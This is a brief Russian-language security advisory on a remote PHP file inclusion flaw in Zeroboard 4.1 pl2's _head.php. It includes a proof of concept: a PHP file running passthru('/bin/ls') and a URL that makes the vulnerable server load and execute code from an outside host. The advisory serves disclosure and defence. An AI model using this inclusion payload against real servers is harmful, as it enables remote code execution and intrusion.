Zeroboard - PHP доска объявлений для LINUX и UNIX платформ. 

Уязвимость позволяет включать произвольные PHP файлы. Файл _head.php недостаточно санирует входящие параметры. Если в php.ini установлены переменные "allow_url_fopen" и "register_globals" в значение "on", можно
включать произвольные PHP файлы из удаленного URL через сценарий _head.php. Пример: 

PHP Source file a.php 

<? passthru("/bin/ls"); ?> 

Accessing URL on vulnerable system: 

http://vulnerablesystem/_head.php?_zb_path=http://example.com/a

Уязвимость обнаружена в Zeroboard 4.1 pl2.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии